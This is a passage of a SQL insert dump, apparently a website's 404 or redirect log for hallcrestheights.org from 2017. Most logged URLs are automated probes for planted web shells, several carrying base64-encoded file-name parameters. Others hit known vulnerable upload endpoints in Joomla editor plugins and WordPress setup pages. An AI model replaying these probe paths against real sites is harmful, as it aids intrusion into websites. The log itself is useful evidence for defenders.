00:00:00'),(10826,'http://hallcrestheights.org/temp1-1.php',NULL,'http://hallcrestheights.org/temp1-1.php','',1,0,'2017-06-16 17:49:39','0000-00-00 00:00:00'),(10827,'http://hallcrestheights.org/functions.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 18:45:36','0000-00-00 00:00:00'),(10828,'http://hallcrestheights.org/configbak.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 18:49:21','0000-00-00 00:00:00'),(10829,'http://hallcrestheights.org/maill.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 18:56:54','0000-00-00 00:00:00'),(10830,'http://hallcrestheights.org/wp-cache.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 18:58:20','0000-00-00 00:00:00'),(10831,'http://hallcrestheights.org/robot.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:00:29','0000-00-00 00:00:00'),(10832,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:00:35','0000-00-00 00:00:00'),(10833,'http://hallcrestheights.org/SessionController.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:00:42','0000-00-00 00:00:00'),(10834,'http://hallcrestheights.org/webconfig.txt.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:00:50','0000-00-00 00:00:00'),(10835,'http://hallcrestheights.org/configurationbak.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:04:10','0000-00-00 00:00:00'),(10836,'http://hallcrestheights.org/robots.txt.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:05:59','0000-00-00 00:00:00'),(10837,'http://hallcrestheights.org/sql_dump.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:07:48','0000-00-00 00:00:00'),(10838,'http://hallcrestheights.org/jconfig.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:11:10','0000-00-00 00:00:00'),(10839,'http://hallcrestheights.org/thumb.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:12:59','0000-00-00 00:00:00'),(10840,'http://hallcrestheights.org/al277.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:17:07','0000-00-00 00:00:00'),(10841,'http://hallcrestheights.org/images/al277.php?z3=VXZCYTV1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:20:13','0000-00-00 00:00:00'),(10842,'http://hallcrestheights.org/wsdl.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:22:04','0000-00-00 00:00:00'),(10843,'http://hallcrestheights.org/wp-data.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:23:03','0000-00-00 00:00:00'),(10844,'http://hallcrestheights.org/media/1ndex.php?z3=VXZCYTV1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:33:26','0000-00-00 00:00:00'),(10845,'http://hallcrestheights.org/media/tmp.php?z3=VXZCYTV1LnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:33:41','0000-00-00 00:00:00'),(10846,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:37:13','0000-00-00 00:00:00'),(10847,'http://hallcrestheights.org/google-assist.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:39:01','0000-00-00 00:00:00'),(10848,'http://hallcrestheights.org/images/google-assist.php?z3=VXZCYTV1LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:40:54','0000-00-00 00:00:00'),(10849,'http://hallcrestheights.org/cache/defau1t.php?z3=VXZCYTV1LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:46:08','0000-00-00 00:00:00'),(10850,'http://hallcrestheights.org/roubt.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:46:32','0000-00-00 00:00:00'),(10851,'http://hallcrestheights.org/bookmark.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 19:46:38','0000-00-00 00:00:00'),(10852,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:52:05','0000-00-00 00:00:00'),(10853,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 19:53:54','0000-00-00 00:00:00'),(10854,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:01:22','0000-00-00 00:00:00'),(10855,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-16 20:01:30','0000-00-00 00:00:00'),(10856,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:03:27','0000-00-00 00:00:00'),(10857,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:03:33','0000-00-00 00:00:00'),(10858,'http://hallcrestheights.org/A.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:06:04','0000-00-00 00:00:00'),(10859,'http://hallcrestheights.org/modules/modules/modules.php?z3=VXZCYTV1LnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:09:09','0000-00-00 00:00:00'),(10860,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2017-06-16 20:10:52','0000-00-00 00:00:00'),(10861,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-06-16 20:11:00','0000-00-00 00:00:00'),(10862,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=VXZCYTV1LnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:11:08','0000-00-00 00:00:00'),(10863,'http://hallcrestheights.org/email.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:18:09','0000-00-00 00:00:00'),(10864,'http://hallcrestheights.org/goog1es.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:23:53','0000-00-00 00:00:00'),(10865,'http://hallcrestheights.org/error-log.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:27:29','0000-00-00 00:00:00'),(10866,'http://hallcrestheights.org/shootmei.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 20:35:39','0000-00-00 00:00:00'),(10867,'http://hallcrestheights.org/infos.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 20:36:10','0000-00-00 00:00:00'),(10868,'http://hallcrestheights.org/Abbrevsprl.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:42:25','0000-00-00 00:00:00'),(10869,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:43:28','0000-00-00 00:00:00'),(10870,'http://hallcrestheights.org/RoseLeif.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:48:23','0000-00-00 00:00:00'),(10871,'http://hallcrestheights.org/shootme.php?z3=VXZCYTV1LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 20:52:14','0000-00-00 00:00:00'),(10872,'http://hallcrestheights.org/configbak.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:02:49','0000-00-00 00:00:00'),(10873,'http://hallcrestheights.org/maill.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:05:43','0000-00-00 00:00:00'),(10874,'http://hallcrestheights.org/wp-cache.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:05:46','0000-00-00 00:00:00'),(10875,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=YU9LdGpXLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:07:09','0000-00-00 00:00:00'),(10876,'http://hallcrestheights.org/webconfig.txt.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:09:38','0000-00-00 00:00:00'),(10877,'http://hallcrestheights.org/news.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:10:03','0000-00-00 00:00:00'),(10878,'http://hallcrestheights.org/sql_dump.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:13:07','0000-00-00 00:00:00'),(10879,'http://hallcrestheights.org/jconfig.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:11:50','0000-00-00 00:00:00'),(10880,'http://hallcrestheights.org/thumb.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:12:14','0000-00-00 00:00:00'),(10881,'http://hallcrestheights.org/al277.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:14:31','0000-00-00 00:00:00'),(10882,'http://hallcrestheights.org/images/al277.php?z3=YU9LdGpXLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:13:13','0000-00-00 00:00:00'),(10883,'http://hallcrestheights.org/wsdl.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:14:56','0000-00-00 00:00:00'),(10884,'http://hallcrestheights.org/wp-data.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:13:37','0000-00-00 00:00:00'),(10885,'http://hallcrestheights.org/media/1ndex.php?z3=YU9LdGpXLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:15:56','0000-00-00 00:00:00'),(10886,'http://hallcrestheights.org/media/tmp.php?z3=YU9LdGpXLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:15:58','0000-00-00 00:00:00'),(10887,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=YU9LdGpXLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:16:05','0000-00-00 00:00:00'),(10888,'http://hallcrestheights.org/google-assist.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:16:08','0000-00-00 00:00:00'),(10889,'http://hallcrestheights.org/images/google-assist.php?z3=YU9LdGpXLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:16:32','0000-00-00 00:00:00'),(10890,'http://hallcrestheights.org/elements.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:16:32','0000-00-00 00:00:00'),(10891,'http://hallcrestheights.org/cache/defau1t.php?z3=YU9LdGpXLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:16:55','0000-00-00 00:00:00'),(10892,'http://hallcrestheights.org/roubt.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:15:37','0000-00-00 00:00:00'),(10893,'http://hallcrestheights.org/bookmark.php?z3=YU9LdGpXLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-06-16 21:17:01','0000-00-00 00:00:00'),(10894,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=YU9LdGpXLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:18:30','0000-00-00 00:00:00'),(10895,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=YU9LdGpXLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',1,0,'2017-06-16 21:26:59','0000-00-00 00:00:00'),(10896,'http://hallcrestheights.org/plugins/editors/jce/tiny_mce/plugins/imgmanager/langs/strcoll_enc-d.php',NULL,'http://hallcrestheights.org/plugins/editors/jce/tiny_mce/plugins/imgmanager/langs/strcoll_enc-d.php','',1,0,'2017-06-17 00:42:35','0000-00-00 00:00:00'),(10897,'http://hallcrestheights.org/media/editors/tinymce/plugins/insertdatetime/config.php',NULL,'http://hallcrestheights.org/media/editors/tinymce/plugins/insertdatetime/config.php','',1,0,'2017-06-17 01:54:01','0000-00-00 00:00:00'),(10898,'http://hallcrestheights.org/components/com_weblinks/views/form/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_weblinks/views/form/tmpl/config.php','',1,0,'2017-06-17 07:09:11','0000-00-00 00:00:00'),(10899,'http://hallcrestheights.org/content-wrapper.php',NULL,'http://hallcrestheights.org/content-wrapper.php','',5,0,'2017-06-17 11:36:16','0000-00-00 00:00:00'),(10900,'http://hallcrestheights.org/c0nfig.php',NULL,'http://hallcrestheights.org/c0nfig.php','',2,0,'2017-06-17 11:36:54','0000-00-00 00:00:00'),(10901,'http://hallcrestheights.org/media/widgetkit/widgets/gallery/styles/showcase/images/gethostbynamel.php',NULL,'http://hallcrestheights.org/media/widgetkit/widgets/gallery/styles/showcase/images/gethostbynamel.php','',1,0,'2017-06-17 12:46:07','0000-00-00 00:00:00'),(10902,'http://hallcrestheights.org/plugins/content/ini.php',NULL,'http://hallcrestheights.org/plugins/content/ini.php','',2,0,'2017-06-17 13:08:31','0000-00-00 00:00:00'),(10903,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/addon/edit/config.php','',1,0,'2017-06-17 14:09:11','0000-00-00 00:00:00'),(10904,'http://hallcrestheights.org/components/com_foxcontact/',NULL,'','',9,0,'2017-06-17 17:53:11','0000-00-00 00:00:00'),(10905,'http://hallcrestheights.org/cron.php',NULL,'http://hallcrestheights.org/cron.php','',2,0,'2017-06-17 21:28:17','0000-00-00 00:00:00'),(10906,'http://www.hallcrestheights.org/zmkuedtz-k15220-jivyo-qxifgxuh-xptvuhm-i20162632-iwnz-korpv-ubfgnq-tpmh-prbikzon.htm',NULL,'','',14,0,'2017-06-18 03:45:45','0000-00-00 00:00:00'),(10907,'http://hallcrestheights.org/templates/rt_afterburner_j15/js/gzencode.php',NULL,'http://hallcrestheights.org/templates/rt_afterburner_j15/js/gzencode.php','',1,0,'2017-06-18 08:58:37','0000-00-00 00:00:00'),(10908,'http://hallcrestheights.org/components/com_newsfeeds/views/categories/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_newsfeeds/views/categories/tmpl/config.php','',1,0,'2017-06-18 10:15:32','0000-00-00 00:00:00'),(10909,'http://hallcrestheights.org/index.php?option=com_community&view=frontpage',NULL,'','',2,0,'2017-06-20 16:58:03','0000-00-00 00:00:00'),(10910,'http://www.hallcrestheights.org/pcscqruf-k35680-unpkw-xpoideot-wtvsoar-i20162629-mosm-gepla-lheliy.htm',NULL,'','',1,0,'2017-06-21 01:41:17','0000-00-00 00:00:00'),(10911,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',2,0,'2017-06-21 06:52:02','0000-00-00 00:00:00'),(10912,'http://hallcrestheights.org//libraries/joomla/jmails.php?u',NULL,'','',2,0,'2017-06-21 15:31:16','0000-00-00 00:00:00'),(10913,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k1212-sllge-ajanpd-i20162634-mefnxhq-fhjdyhao-xrcjhwu-vdsvezyt-wlcy-cwscpuak.htm',NULL,'','',2,0,'2017-06-22 06:19:52','0000-00-00 00:00:00'),(10914,'http://www.hallcrestheights.org/k584-jglet-i20162633-kymd-rqzn-rvmlkswa.htm',NULL,'https://www.google.co.jp/','',1,0,'2017-06-22 08:59:29','0000-00-00 00:00:00'),(10915,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx-dosfiet-i20162635-yuaixnrb-dggsaarh-k24477-efskjyd-mrujwimj-qiaau/',NULL,'','',1,0,'2017-06-22 11:41:42','0000-00-00 00:00:00'),(10916,'http://hallcrestheights.org/__media__/js/netsoltrademark.php?d=rumudisaduxodot.tk',NULL,'','',9,0,'2017-06-22 15:45:41','0000-00-00 00:00:00'),(10917,'http://hallcrestheights.org/xmlrpc/logo_img.php',NULL,'http://hallcrestheights.org/xmlrpc/logo_img.php','',6,0,'2017-06-22 19:31:41','0000-00-00 00:00:00'),(10918,'http://hallcrestheights.org/components/com_jce/editor/extensions/aggregator/vimeo/htaccess.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/extensions/aggregator/vimeo/htaccess.php','',3,0,'2017-06-22 19:33:10','0000-00-00 00:00:00'),(10919,'http://hallcrestheights.org/install/popup-pomo.php',NULL,'http://hallcrestheights.org/install/popup-pomo.php','',7,0,'2017-06-22 19:33:49','0000-00-00 00:00:00'),(10920,'http://hallcrestheights.org/components/com_content/views/featured/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_content/views/featured/tmpl/config.php','',2,0,'2017-06-22 19:34:42','0000-00-00 00:00:00'),(10921,'http://hallcrestheights.org/media/editors/codemirror/mode/z80/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/z80/config.php','',2,0,'2017-06-22 19:39:55','0000-00-00 00:00:00'),(10922,'http://hallcrestheights.org/themes/popup-pomo.php',NULL,'http://hallcrestheights.org/themes/popup-pomo.php','',7,0,'2017-06-22 20:29:02','0000-00-00 00:00:00'),(10923,'http://hallcrestheights.org/libraries/joomla/github/package/users/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/github/package/users/backup.php','',1,0,'2017-06-22 20:34:53','0000-00-00 00:00:00'),(10924,'http://hallcrestheights.org/components/com_content/views/category/tmpl/update.php',NULL,'http://hallcrestheights.org/components/com_content/views/category/tmpl/update.php','',2,0,'2017-06-22 21:23:18','0000-00-00 00:00:00'),(10925,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/nonbreaking/htaccess.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/tiny_mce/plugins/nonbreaking/htaccess.php','',3,0,'2017-06-22 22:23:17','0000-00-00 00:00:00'),(10926,'http://hallcrestheights.org/plugins/content/settings.php',NULL,'http://hallcrestheights.org/plugins/content/settings.php','',5,0,'2017-06-22 23:14:39','0000-00-00 00:00:00'),(10927,'http://hallcrestheights.org/maint/popup-pomo.php',NULL,'http://hallcrestheights.org/maint/popup-pomo.php','',8,0,'2017-06-23 01:11:01','0000-00-00 00:00:00'),(10928,'http://hallcrestheights.org/libraries/joomla/form/fields/backup.php',NULL,'http://hallcrestheights.org/libraries/joomla/form/fields/backup.php','',2,0,'2017-06-23 02:00:45','0000-00-00 00:00:00'),(10929,'http://hallcrestheights.org/phpmail/popup-pomo.php',NULL,'http://hallcrestheights.org/phpmail/popup-pomo.php','',8,0,'2017-06-23 02:03:10','0000-00-00 00:00:00'),(10930,'http://hallcrestheights.org/changelog.php',NULL,'http://hallcrestheights.org/changelog.php','',3,0,'2017-06-23 02:01:52','0000-00-00 00:00:00'),(10931,'http://hallcrestheights.org/components/com_jce/editor/libraries/img/config.php',NULL,'http://hallcrestheights.org/components/com_jce/editor/libraries/img/config.php','',1,0,'2017-06-23 02:04:34','0000-00-00 00:00:00'),(10932,'http://hallcrestheights.org/components/com_content/views/frontpage/tmpl/config.php',NULL,'http://hallcrestheights.org/components/com_content/views/frontpage/tmpl/config.php','',1,0,'2017-06-23 07:34:53','0000-00-00 00:00:00'),(10933,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k15620-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb.htm',NULL,'http://www.google.co.jp/','',2,0,'2017-06-24 00:21:46','0000-00-00 00:00:00'),(10934,'http://hallcrestheights.org/images/py.php',NULL,'http://hallcrestheights.org/images/py.php','',2,0,'2017-06-26 02:06:19','0000-00-00 00:00:00'),(10935,'http://hallcrestheights.org//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20',NULL,'','',1,0,'2017-06-26 07:59:20','0000-00-00 00:00:00'),(10936,'http://hallcrestheights.org/media/editors/codemirror/mode/pascal/config.php',NULL,'http://hallcrestheights.org/media/editors/codemirror/mode/pascal/config.php','',1,0,'2017-06-26 08:04:32','0000-00-00 00:00:00'),(10937,'http://www.hallcrestheights.org/bsoapaz-k60273-apsta-sgmhcq-cmckfr-dtfkg-pvbc-hsiwho-i20162631-rklvzr/',NULL,'android-app://com.google.android.googlequicksearchbox','',2,0,'2017-06-27 08:47:33','0000-00-00 00:00:00'),(10938,'http://hallcrestheights.org/i20162636-k51884-vqjny-spvh-oljp-eurrtpil.htm',NULL,'','',3,0,'2017-06-29 13:35:44','0000-00-00 00:00:00'),(10939,'http://hallcrestheights.org/modules/modules/temp.php',NULL,'hallcrestheights.org','',3,0,'2017-06-30 12:04:52','0000-00-00 00:00:00'),(10940,'http://hallcrestheights.org/sample.php',NULL,'hallcrestheights.org','',4,0,'2017-06-30 12:05:03','0000-00-00 00:00:00'),(10941,'http://hallcrestheights.org/yt.php',NULL,'hallcrestheights.org','',7,0,'2017-06-30 12:05:41','0000-00-00 00:00:00'),(10942,'http://hallcrestheights.org/sfn.php',NULL,'hallcrestheights.org','',4,0,'2017-06-30 12:05:59','0000-00-00 00:00:00'),(10943,'http://hallcrestheights.org/rnnvhs.php',NULL,'hallcrestheights.org','',4,0,'2017-06-30 12:13:25','0000-00-00 00:00:00'),(10944,'http://hallcrestheights.org/new/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-30 12:28:44','0000-00-00 00:00:00'),(10945,'http://hallcrestheights.org/blogs/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-30 12:28:44','0000-00-00 00:00:00'),(10946,'http://hallcrestheights.org/news/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-30 12:28:46','0000-00-00 00:00:00'),(10947,'http://hallcrestheights.org/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-30 12:28:46','0000-00-00 00:00:00'),(10948,'http://hallcrestheights.org/blog/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-30 12:27:27','0000-00-00 00:00:00'),(10949,'http://www.hallcrestheights.org/ryvhrhm-i20162633-qtyysllg-eajanpdm-efnxhqf-hjdyha-oxrcj-k328-hwuvdsve.htm',NULL,'https://www.google.co.jp/','',4,0,'2017-07-01 07:55:47','0000-00-00 00:00:00'),(10950,'http://hallcrestheights.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20',NULL,'','',3,0,'2017-07-02 00:18:24','0000-00-00 00:00:00'),(10951,'http://hallcrestheights.org/shop',NULL,'hallcrestheights.org/shop','',1,0,'2017-07-02 22:11:53','0000-00-00 00:00:00'),(10952,'http://hallcrestheights.org/sqlbak.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 04:09:56','0000-00-00 00:00:00'),(10953,'http://hallcrestheights.org/functions.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:15:16','0000-00-00 00:00:00'),(10954,'http://hallcrestheights.org/cache/cachee.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:16:56','0000-00-00 00:00:00'),(10955,'http://hallcrestheights.org/wp-admin/includes/rnnvhs.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWFkbWluL2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:17:18','0000-00-00 00:00:00'),(10956,'http://hallcrestheights.org/languages/rnnvhs.php?z3=R0tBNWpRLnBocA==&z4=L2xhbmd1YWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:17:47','0000-00-00 00:00:00'),(10957,'http://hallcrestheights.org/images/rnnvhs.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:18:10','0000-00-00 00:00:00'),(10958,'http://hallcrestheights.org/wp-admin/network/rnnvhs.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWFkbWluL25ldHdvcmsv',NULL,'hallcrestheights.org','',4,0,'2017-07-04 04:17:15','0000-00-00 00:00:00'),(10959,'http://hallcrestheights.org/language/en-GB/rnnvhs.php?z3=R0tBNWpRLnBocA==&z4=L2xhbmd1YWdlL2VuLUdCLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:17:37','0000-00-00 00:00:00'),(10960,'http://hallcrestheights.org/cache/news.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:19:35','0000-00-00 00:00:00'),(10961,'http://hallcrestheights.org/shootme.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',8,0,'2017-07-04 04:20:21','0000-00-00 00:00:00'),(10962,'http://hallcrestheights.org/configurationbak.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:20:37','0000-00-00 00:00:00'),(10963,'http://hallcrestheights.org/robots.txt.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:20:57','0000-00-00 00:00:00'),(10964,'http://hallcrestheights.org/jconfig.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:21:24','0000-00-00 00:00:00'),(10965,'http://hallcrestheights.org/media/reads.php?z3=R0tBNWpRLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:21:45','0000-00-00 00:00:00'),(10966,'http://hallcrestheights.org/wp-admin/users.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:20:53','0000-00-00 00:00:00'),(10967,'http://hallcrestheights.org/pols.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:22:36','0000-00-00 00:00:00'),(10968,'http://hallcrestheights.org/ytt.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:22:19','0000-00-00 